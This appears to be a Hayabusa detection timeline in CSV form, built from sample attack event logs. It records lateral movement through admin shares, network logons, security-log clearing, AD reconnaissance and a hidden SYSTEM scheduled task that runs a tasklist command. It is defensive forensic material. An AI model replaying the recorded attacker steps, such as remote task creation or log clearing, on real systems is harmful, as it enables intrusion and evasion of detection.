+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x10fbcc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x10fbeb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer:  | IP Addr: 10.0.2.17 | LID: 0x110085,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer:  | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.2"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id=""LocalSystem""> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""LocalSystem""> <Exec> <Command>cmd.exe</Command> <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> </Exec> </Actions> </Task> | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
+2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: <?xml version=""1.0"" encoding=""UTF-16""?> <Task version=""1.2"" xmlns=""http://schemas.microsoft.com/windows/2004/02/mit/task""> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id=""LocalSystem""> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context=""LocalSystem""> <Exec> <Command>cmd.exe</Command> <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> </Exec> </Actions> </Task> | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
